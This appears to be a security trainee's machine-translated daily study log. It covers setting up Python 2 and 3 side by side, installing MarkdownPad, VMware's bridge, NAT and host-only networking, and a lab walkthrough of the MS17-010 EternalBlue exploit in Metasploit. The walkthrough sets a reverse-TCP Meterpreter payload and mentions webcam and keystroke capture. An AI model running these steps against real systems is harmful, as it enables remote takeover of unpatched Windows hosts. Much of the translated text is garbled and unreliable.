Daily Recording 2020/01/06 (Keywords: built environment, exploits)

Daily Recording

Wang yuan can

January 6, 2020

@ Rain Man Network Security

1, knowledge summary

1. Let Python2 coexist with Python3

　. (1) Download: Download python2.7.17 and 3.7 versions of Python official website, select the file "download Windows x86-64 the MSI Installer "

　(2). Installation: install python2, then install python3, when mounted respectively create a new folder, such as "Python27" to save python2, and by default, automatically configure the environment variables

   (3) the environment variables configuration: the selected variables in the system environment variable path, and to python2 python3 two new path, respectively, in Example python2, path1 as: C: \ Python27 (i.e., the installation path python2), path2 configuration \ Python27 \ scripts (i.e. scripts folder path), python3 analogous thereto: Found: C

   . (4) Delete pip.exe: delete the C: \ Python27 \ pip.exe under Scripts, reservations pip2.exe

   (5) Rename: the C: \ Python27 and C: \ file renamed to the Python37 python2 and to distinguish python3

   (6). Test: type python in cmd, default startup python3 version, to switch to python2 version, directly enter the command python2

2. Download Markdown

  (1). Download: In the markdown official website to download this application http://markdownpad.com/

  . (2) Installation awesomium: installed there will be an error message when you can not use the markdown, awesomium should be installed, can break the net from my love download https://pan.baidu.com/s/1qY7LKba

3.ms17-010 exploits

step1: Record attacker and victim host ip address

　　In kali terminal with the command " ifconfig ", find inet, namely kali attack the host ip address

               

　　　　Enter the drone cmd command " ipconfig ", find ipv4 address of the local connection

　　　　

　　Lhost: 192.168.110.135
　　rhost: 192.168.110.137
step2: Check whether the survival of the victim host, you can use the ping command, and with the use nmap
　　ping  192.168.110.137

       

step3: Start Framework Metasploit
　　msfconsole
step4: Search loophole "ms17-010"
　　Search  ms17-010
STEP5: Use the appropriate module
　　use exploit / windows / smb / ms17_010_eternalblue

       

step6: Display settings (which needs to be configured is displayed under the module)
　　Show Options
STEP7: Set payload
　　the SET payload Windows / x64 / Meterpreter / reverse_tcp
step8: the victim host and attack the host ip
　　the SET rhost 192.168.110.137 the SET lhost 192.168.110.135 step9: He began to attack exploit
　　

　　

       

　　Appears meterpreter, description successful penetration
PS :. 1 illustrates a display win when the attack is successful, press the Enter key to enter cmd win7 the
　　2.Meterpreter Shell Code is under Metasploit default Windows systems, can exploit expansion in meterpreter, such as enabled camera, keyboard, monitor
　　2 may be "terminal-Preference-Unnamed-Compatibility -Encoding", select "Chinese Simplified GBK" when the terminal garbled

The difference 4.vmware three means of access

1. bridge mode (Bridge)

Principle: Bridge "bridge" refers to the host, this machine has two network cards, respectively in the two local area networks while on the "bridge" to run the program allows the LAN packet A in intact inflow of B, and vice versa However. When the bridge, VMWare network adapter and the physical network card should be in the same IP network segment, when using a bridge, VMWare will be a virtual one network card and a real physical card on the line bridge, so that hair to a physical NIC of all packets on to VMWare virtual machine, and the data packet sent by VMWare also emitted from the end of the line by the physical NIC bridge. If the physical network card can access, then the card can also be bridged soft online. 　　

Networking: This is a networking easiest way, in the LAN, the host is how networked, virtual machine on how networking. The virtual machine can be seen as another computer on the LAN.

 

Figure 1. Schematic bridge mode

　　2. Address Translation Mode (NAT)

Principle: NAT (Network address translate), VMWare's NAT when the Internet between the host and the virtual machines using counterfeit software out of a piece of card, ip this card and virtual machines in an address segment. At the same time, a piece of NAT between the network interface card and host. Each piece of data packets will be sent through the virtual machine virtual card, then NAT, then issued by the host interface. Virtual NICs and virtual machines in an address section, address a different segment virtual machine and the host, the equivalent of a virtual machine gateway, virtual machines can ping the IP host, but the host can not ping the virtual machine's IP.

　　Networking: 1 dynamic IP address: The virtual machine is set to use DHCP Internet, select the next Windows "automatically obtain IP", open the DHCP service under linux. (A "Edit → Virtual Network Settings" in VMware, the NAT and DHCP are enabled by default opened a general NAT, DHCP off by default.) 2 static IP address:. IP setup and vmnet1 same network segment, gateway gateway set to vmnet8 (net tab of the "virtual network settings" can be found in the Gateway) is usually xxx.xxx.xxx.2. Provided the VMnet8 same subnet mask (After setting the IP address, subnet mask automatically generated) is provided with the DNS same host. Use NAT technology, host access to the Internet, a virtual machine can access the Internet, but the host can not access the virtual machine.

 

Figure 2. Schematic address translation mode

3. Host only mode (Host-only)

        Principle: to provide network access between hosts and virtual machines. Only let there between the virtual machine and the host data exchange, and not let the virtual machine access the Internet. Host-only under the conditions of, VMWare in a real Windows system, the establishment of a soft card. This card can be seen in the network connection, usually VMNET1, the role of this card is to make Windows see IP virtual machines.

Figure 3. Schematic host-only mode

 2, personal summary

1. 总结：第一天主要接触了一些提高工作和开发效率的软件和插件，这些丰富的插件下载起来并不是一件容易的事情，就像Teacher Bai所说，装软件、搭建环境是一件让人抓狂的事情，但对一个即将步入计算机行业的从业者来说势必将经历过无数次这样“痛并快乐着”的过程。我们看到，安全行业当前处于风口期，许多的人为了一份丰厚的薪水涌入到这个领域当中，相信再过几年，网络安全的人才便会如雨后春笋一般大量涌现，对应着的行业门槛也将水涨船高。Teacher Bai给我们展示了一个优秀的人是如何一直保持学习的态度，并建立起自己的知识库的。这也让我深受启发，只有“always learning”，在一个又一个新的时期提升自我，才能有所得，有所成。

2.其他：

（1）.从这些地方找你想要的资料：

• • 吾爱破解网
  • github
  • MSDN(下载你需要的OS，这里的OS干净，基本不会携带病毒)

　　（2）.学习榜样

　　　　构建知识库：https://github.com/404notf0und/Always-Learning

3.参考资料

　　1.vmware三种连网方式：1.https://www.cnblogs.com/xuyatao/p/9778975.html 

　　　　　　　　　　　　　　2.https://blog.csdn.net/taotongning/article/details/81477472